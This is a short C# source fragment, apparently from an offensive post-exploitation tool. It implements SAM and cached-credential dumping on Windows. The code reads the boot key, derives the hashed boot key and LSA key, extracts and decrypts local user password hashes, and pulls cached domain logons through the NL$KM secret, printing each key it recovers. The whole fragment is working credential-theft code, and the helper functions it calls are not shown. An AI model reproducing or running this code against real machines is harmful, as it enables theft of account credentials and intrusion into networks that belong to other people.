////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal SAM()
{
Byte[] bootKey = LSASecrets.GetBootKey();
Console.WriteLine("[+] BootKey: {0}", System.BitConverter.ToString(bootKey).Replace("-", ""));
Byte[] hBootKey = GetHBootKey(bootKey);
Console.WriteLine("[+] HBootKey: {0}", System.BitConverter.ToString(hBootKey).Replace("-", ""));
UserKeys[] userKeys = GetUserHashes(hBootKey);
DecryptUserHashes(ref userKeys, hBootKey);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal CacheDump()
{
String logonCount = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "CachedLogonsCount");
Console.WriteLine("[*] {0} Cached Logons Set", logonCount);
Byte[] bootKey = LSASecrets.GetBootKey();
Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
Byte[] lsaKey = LSASecrets.GetLsaKey(bootKey);
Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));
Byte[] nlkm = GetNlkm(lsaKey);
Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(nlkm).Replace("-", ""));
GetCache(nlkm);
}
